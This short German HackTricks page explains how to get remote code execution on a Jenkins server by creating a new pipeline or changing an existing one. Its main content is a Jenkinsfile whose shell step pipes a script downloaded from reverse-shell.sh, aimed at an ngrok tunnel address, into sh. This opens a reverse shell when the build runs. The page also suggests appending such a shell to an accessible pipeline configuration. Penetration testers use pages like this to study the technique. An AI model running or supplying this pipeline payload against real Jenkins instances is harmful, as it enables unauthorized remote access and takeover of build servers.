Jenkins RCE Creating/Modifying Pipeline

Unterstütze HackTricks

Erstellen einer neuen Pipeline

In "New Item" (zugänglich unter /view/all/newJob) wähle Pipeline:

Im Pipeline-Bereich schreibe die reverse shell:

pipeline {
agent any

stages {
stage('Hello') {
steps {
sh '''
curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
'''
}
}
}
}

Schließlich klicken Sie auf Save und Build Now, und die Pipeline wird ausgeführt:

Modifizieren einer Pipeline

Wenn Sie auf die Konfigurationsdatei einer konfigurierten Pipeline zugreifen können, könnten Sie sie einfach modifizieren, indem Sie Ihre Reverse Shell anhängen und sie dann ausführen oder warten, bis sie ausgeführt wird.

Unterstützen Sie HackTricks

Last updated